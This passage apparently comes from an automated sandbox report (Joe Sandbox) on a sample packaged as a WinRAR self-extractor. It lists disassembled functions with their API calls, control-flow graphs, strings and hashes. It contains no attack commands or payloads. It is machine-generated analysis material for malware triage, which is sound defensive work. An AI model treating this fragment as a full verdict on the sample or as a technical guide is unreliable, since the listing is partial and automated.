                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088BD1E
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0088BD7D
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,008A35F4), ref: 0088BD94
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0088BD9D
                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0088BDAC
                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0088BDBB
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0088BE68
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0088BEBE
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088BEE8
                                                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0088BF32
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0088BF4C
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0088BF55
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0088BF6B
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0088BF85
                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,008BA472), ref: 0088BFA7
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0088C007
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0088C01A
                                                                                                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0088C0BD
                                                                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0088C197
                                                                                                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0088C1D9
                                                                                                                                                                                                      • Part of subcall function 0088C73F: __EH_prolog.LIBCMT ref: 0088C744
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0088C1FD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellShowSleepTickTranslateUnmapWait__vswprintf_c_l
                                                                                                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                                                                                    • API String ID: 2472041962-2238251102
                                                                                                                                                                                                    • Opcode ID: 0270b7d1c0f0452a78a4e96306145a46ab4fd4ec37ca96ce22530239467a62e7
                                                                                                                                                                                                    • Instruction ID: 509c5de347b64c57190d3c01c47a7107a7635d52bfa0feeed8739786918270e2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0270b7d1c0f0452a78a4e96306145a46ab4fd4ec37ca96ce22530239467a62e7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA42D370944259BAEB21BBB89C4AFBE7B7CFB02700F044155F644E61D2CB759E44CB26
                                                                                                                                                                                                    Function 00880863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 267 880863-880886 call 88ec50 GetModuleHandleW 270 880888-88089f GetProcAddress 267->270 271 8808e7-880b48 267->271 274 8808b9-8808c9 GetProcAddress 270->274 275 8808a1-8808b7 270->275 272 880b4e-880b59 call 8975fb 271->272 273 880c14-880c40 GetModuleFileNameW call 87c29a call 880602 271->273 272->273 285 880b5f-880b8d GetModuleFileNameW CreateFileW 272->285 290 880c42-880c4e call 87b146 273->290 276 8808cb-8808e0 274->276 277 8808e5 274->277 275->274 276->277 277->271 287 880c08-880c0f CloseHandle 285->287 288 880b8f-880b9b SetFilePointer 285->288 287->273 288->287 291 880b9d-880bb9 ReadFile 288->291 297 880c7d-880ca4 call 87c310 GetFileAttributesW 290->297 298 880c50-880c5b call 88081b 290->298 291->287 293 880bbb-880be0 291->293 294 880bfd-880c06 call 880371 293->294 294->287 304 880be2-880bfc call 88081b 294->304 307 880cae 297->307 308 880ca6-880caa 297->308 298->297 306 880c5d-880c7b CompareStringW 298->306 304->294 306->297 306->308 311 880cb0-880cb5 307->311 308->290 310 880cac 308->310 310->311 312 880cec-880cee 311->312 313 880cb7 311->313 314 880dfb-880e05 312->314 315 880cf4-880d0b call 87c2e4 call 87b146 312->315 316 880cb9-880ce0 call 87c310 GetFileAttributesW 313->316 326 880d0d-880d6e call 88081b * 2 call 87e617 call 874092 call 87e617 call 88a7e4 315->326 327 880d73-880da6 call 874092 AllocConsole 315->327 322 880cea 316->322 323 880ce2-880ce6 316->323 322->312 323->316 325 880ce8 323->325 325->312 333 880df3-880df5 ExitProcess 326->333 332 880da8-880ded GetCurrentProcessId AttachConsole call 893e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->332 327->333 332->333
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0088087C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0088088E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008808BF
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00880B69
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00880B83
                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00880B93
                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,008A3C7C,00000000), ref: 00880BB1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00880C09
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00880C1E
                                                                                                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,008A3C7C,?,00000000,?,00000800), ref: 00880C72
                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,008A3C7C,00000800,?,00000000,?,00000800), ref: 00880C9C
                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,008A3D44,00000800), ref: 00880CD8
                                                                                                                                                                                                      • Part of subcall function 0088081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00880836
                                                                                                                                                                                                      • Part of subcall function 0088081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087F2D8,Crypt32.dll,00000000,0087F35C,?,?,0087F33E,?,?,?), ref: 00880858
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00880D4A
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00880D96
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                    • AllocConsole.KERNEL32 ref: 00880D9E
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00880DA8
                                                                                                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00880DAF
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00880DC4
                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00880DD5
                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00880DDC
                                                                                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00880DE7
                                                                                                                                                                                                    • FreeConsole.KERNEL32 ref: 00880DED
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00880DF5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                                                                                    • API String ID: 1207345701-3298887752
                                                                                                                                                                                                    • Opcode ID: 15a5f1247125ac8410cbf145735384f4df548cf94dd94650d508db06445b1350
                                                                                                                                                                                                    • Instruction ID: 1ae19f3de4edeed235f244434f67b1b9478e4ab2662839c6b60d66a4ca90792c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15a5f1247125ac8410cbf145735384f4df548cf94dd94650d508db06445b1350
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CD163B1008784AFE761AF94C849B9FBAE8FB86704F50491DF289D6650DBB4864CCF52
                                                                                                                                                                                                    Function 0088C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 346 88c73f-88c757 call 88eb78 call 88ec50 351 88d40d-88d418 346->351 352 88c75d-88c787 call 88b314 346->352 352->351 355 88c78d-88c792 352->355 356 88c793-88c7a1 355->356 357 88c7a2-88c7b7 call 88af98 356->357 360 88c7b9 357->360 361 88c7bb-88c7d0 call 881fbb 360->361 364 88c7dd-88c7e0 361->364 365 88c7d2-88c7d6 361->365 367 88d3d9-88d404 call 88b314 364->367 368 88c7e6 364->368 365->361 366 88c7d8 365->366 366->367 367->356 379 88d40a-88d40c 367->379 369 88ca7c-88ca7e 368->369 370 88c7ed-88c7f0 368->370 371 88c9be-88c9c0 368->371 372 88ca5f-88ca61 368->372 369->367 375 88ca84-88ca8b 369->375 370->367 377 88c7f6-88c850 call 88a64d call 87bdf3 call 87a544 call 87a67e call 876edb 370->377 371->367 376 88c9c6-88c9d2 371->376 372->367 374 88ca67-88ca77 SetWindowTextW 372->374 374->367 375->367 380 88ca91-88caaa 375->380 381 88c9d4-88c9e5 call 897686 376->381 382 88c9e6-88c9eb 376->382 432 88c98f-88c9a4 call 87a5d1 377->432 379->351 384 88caac 380->384 385 88cab2-88cac0 call 893e13 380->385 381->382 388 88c9ed-88c9f3 382->388 389 88c9f5-88ca00 call 88b48e 382->389 384->385 385->367 402 88cac6-88cacf 385->402 393 88ca05-88ca07 388->393 389->393 398 88ca09-88ca10 call 893e13 393->398 399 88ca12-88ca32 call 893e13 call 893e3e 393->399 398->399 420 88ca4b-88ca4d 399->420 421 88ca34-88ca3b 399->421 406 88caf8-88cafb 402->406 407 88cad1-88cad5 402->407 409 88cbe0-88cbee call 880602 406->409 410 88cb01-88cb04 406->410 407->410 412 88cad7-88cadf 407->412 430 88cbf0-88cc04 call 89279b 409->430 414 88cb11-88cb2c 410->414 415 88cb06-88cb0b 410->415 412->367 418 88cae5-88caf3 call 880602 412->418 433 88cb2e-88cb68 414->433 434 88cb76-88cb7d 414->434 415->409 415->414 418->430 420->367 429 88ca53-88ca5a call 893e2e 420->429 427 88ca3d-88ca3f 421->427 428 88ca42-88ca4a call 897686 421->428 427->428 428->420 429->367 445 88cc11-88cc62 call 880602 call 88b1be GetDlgItem SetWindowTextW SendMessageW call 893e49 430->445 446 88cc06-88cc0a 430->446 450 88c9aa-88c9b9 call 87a55a 432->450 451 88c855-88c869 SetFileAttributesW 432->451 469 88cb6a 433->469 470 88cb6c-88cb6e 433->470 439 88cbab-88cbce call 893e13 * 2 434->439 440 88cb7f-88cb97 call 893e13 434->440 439->430 474 88cbd0-88cbde call 8805da 439->474 440->439 456 88cb99-88cba6 call 8805da 440->456 480 88cc67-88cc6b 445->480 446->445 452 88cc0c-88cc0e 446->452 450->367 458 88c90f-88c91f GetFileAttributesW 451->458 459 88c86f-88c8a2 call 87b991 call 87b690 call 893e13 451->459 452->445 456->439 458->432 467 88c921-88c930 DeleteFileW 458->467 489 88c8a4-88c8b3 call 893e13 459->489 490 88c8b5-88c8c3 call 87bdb4 459->490 467->432 473 88c932-88c935 467->473 469->470 470->434 477 88c939-88c965 call 874092 GetFileAttributesW 473->477 474->430 487 88c937-88c938 477->487 488 88c967-88c97d MoveFileW 477->488 480->367 484 88cc71-88cc85 SendMessageW 480->484 484->367 487->477 488->432 491 88c97f-88c989 MoveFileExW 488->491 489->490 496 88c8c9-88c908 call 893e13 call 88fff0 489->496 490->450 490->496 491->432 496->458
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0088C744
                                                                                                                                                                                                      • Part of subcall function 0088B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0088B3FB
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0088CA0A
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0088CA13
                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0088CA71
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0088CAB3
                                                                                                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0088CBFB
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0088CC36
                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0088CC46
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,008BA472), ref: 0088CC54
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0088CC7F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                                    • API String ID: 2804936435-312220925
                                                                                                                                                                                                    • Opcode ID: c8ea9dcf611f4b91eefaa78e272d309ed736a03df8100431339985a5bd19e64e
                                                                                                                                                                                                    • Instruction ID: d21e8a8c610eff1135a51d8b73905ecc015aa98d2e334b33ec6d6a4cdc685fac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8ea9dcf611f4b91eefaa78e272d309ed736a03df8100431339985a5bd19e64e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EE152B2900219AADF25EBA4DC85EEE77BCFB05310F4441A6F609E3145EB749F848B61
                                                                                                                                                                                                    Function 0087DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0087DA70
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0087DAAC
                                                                                                                                                                                                      • Part of subcall function 0087C29A: _wcslen.LIBCMT ref: 0087C2A2
                                                                                                                                                                                                      • Part of subcall function 008805DA: _wcslen.LIBCMT ref: 008805E0
                                                                                                                                                                                                      • Part of subcall function 00881B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0087BAE9,00000000,?,?,?,00010464), ref: 00881BA0
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0087DDE9
                                                                                                                                                                                                    • __fprintf_l.LIBCMT ref: 0087DF1C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                                                                                                    • API String ID: 566448164-801612888
                                                                                                                                                                                                    • Opcode ID: 106240e7afec856bd82b16c4ce5f110b727c3a245df1177866ac3b5d6003d629
                                                                                                                                                                                                    • Instruction ID: 2f2e8f1c8e3b726e692f5d5eae6e75f71bf1758721e0408ba9d8ab6f67a7d866
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 106240e7afec856bd82b16c4ce5f110b727c3a245df1177866ac3b5d6003d629
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6732F072900218ABDF25EF68C842AEE77B5FF19304F44815AF909E7285EBB1DD84CB51
                                                                                                                                                                                                    Function 0088D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0088B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088B579
                                                                                                                                                                                                      • Part of subcall function 0088B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088B58A
                                                                                                                                                                                                      • Part of subcall function 0088B568: IsDialogMessageW.USER32(00010464,?), ref: 0088B59E
                                                                                                                                                                                                      • Part of subcall function 0088B568: TranslateMessage.USER32(?), ref: 0088B5AC
                                                                                                                                                                                                      • Part of subcall function 0088B568: DispatchMessageW.USER32(?), ref: 0088B5B6
                                                                                                                                                                                                    • GetDlgItem.USER32(00000068,008CFCB8), ref: 0088D4E8
                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0088AF07,00000001,?,?,0088B7B9,008A506C,008CFCB8,008CFCB8,00001000,00000000,00000000), ref: 0088D510
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0088D51B
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,008A35F4), ref: 0088D529
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088D53F
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0088D559
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088D59D
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0088D5AB
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088D5BA
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088D5E1
                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,008A43F4), ref: 0088D5F0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                                                    • String ID: \
                                                                                                                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                                                                                                                    • Opcode ID: 8378b224e46ea94a99be1e90886f3c56f5f80e8e0a273b9f08aef3860c6f4f3b
                                                                                                                                                                                                    • Instruction ID: 911009197fa8272ba943fad7195ddf2e53ff0aad564eb3ce7e37475d7283c327
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8378b224e46ea94a99be1e90886f3c56f5f80e8e0a273b9f08aef3860c6f4f3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2331AF71146742BBE301EF249C4AFAB7FACFB86704F00061AF551D6291DB659A04C77B
                                                                                                                                                                                                    Function 0088D78F Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 184windowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 835 88d78f-88d7a7 call 88ec50 838 88d9e8-88d9f0 835->838 839 88d7ad-88d7b9 call 893e13 835->839 839->838 842 88d7bf-88d7e7 call 88fff0 839->842 845 88d7e9 842->845 846 88d7f1-88d7ff 842->846 845->846 847 88d801-88d804 846->847 848 88d812-88d818 846->848 849 88d808-88d80e 847->849 850 88d85b-88d85e 848->850 852 88d810 849->852 853 88d837-88d844 849->853 850->849 851 88d860-88d866 850->851 856 88d868-88d86b 851->856 857 88d86d-88d86f 851->857 858 88d822-88d82c 852->858 854 88d84a-88d84e 853->854 855 88d9c0-88d9c2 853->855 859 88d854-88d859 854->859 860 88d9c6 854->860 855->860 856->857 861 88d882-88d898 call 87b92d 856->861 857->861 862 88d871-88d878 857->862 863 88d81a-88d820 858->863 864 88d82e 858->864 859->850 868 88d9cf 860->868 871 88d89a-88d8a7 call 881fbb 861->871 872 88d8b1-88d8bc call 87a231 861->872 862->861 865 88d87a 862->865 863->858 867 88d830-88d833 863->867 864->853 865->861 867->853 870 88d9d6-88d9d8 868->870 874 88d9da-88d9dc 870->874 875 88d9e7 870->875 871->872 880 88d8a9 871->880 881 88d8d9-88d8e6 ShellExecuteExW 872->881 882 88d8be-88d8d5 call 87b6c4 872->882 874->875 878 88d9de-88d9e1 ShowWindow 874->878 875->838 878->875 880->872 881->875 884 88d8ec-88d8f9 881->884 882->881 886 88d8fb-88d902 884->886 887 88d90c-88d90e 884->887 886->887 888 88d904-88d90a 886->888 889 88d910-88d919 IsWindowVisible 887->889 890 88d925-88d938 WaitForInputIdle call 88dc3b 887->890 888->887 891 88d97b-88d987 CloseHandle 888->891 889->890 892 88d91b-88d923 ShowWindow 889->892 894 88d93d-88d944 890->894 895 88d998-88d9a6 891->895 896 88d989-88d996 call 881fbb 891->896 892->890 894->891 897 88d946-88d94e 894->897 895->870 899 88d9a8-88d9aa 895->899 896->868 896->895 897->891 900 88d950-88d961 GetExitCodeProcess 897->900 899->870 902 88d9ac-88d9b2 899->902 900->891 903 88d963-88d96d 900->903 902->870 904 88d9b4-88d9be 902->904 905 88d96f 903->905 906 88d974 903->906 904->870 905->906 906->891
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0088D7AE
                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0088D8DE
                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0088D911
                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0088D91D
                                                                                                                                                                                                    • WaitForInputIdle.USER32(?,000007D0), ref: 0088D92E
                                                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0088D959
                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0088D97F
                                                                                                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 0088D9E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                                                                                                                                                                                    • String ID: .exe$.inf
                                                                                                                                                                                                    • API String ID: 3646668279-3750412487
                                                                                                                                                                                                    • Opcode ID: f0f3df0915f826a5b66e2596612a0613b336783a8837014f4e0e875d0244671f
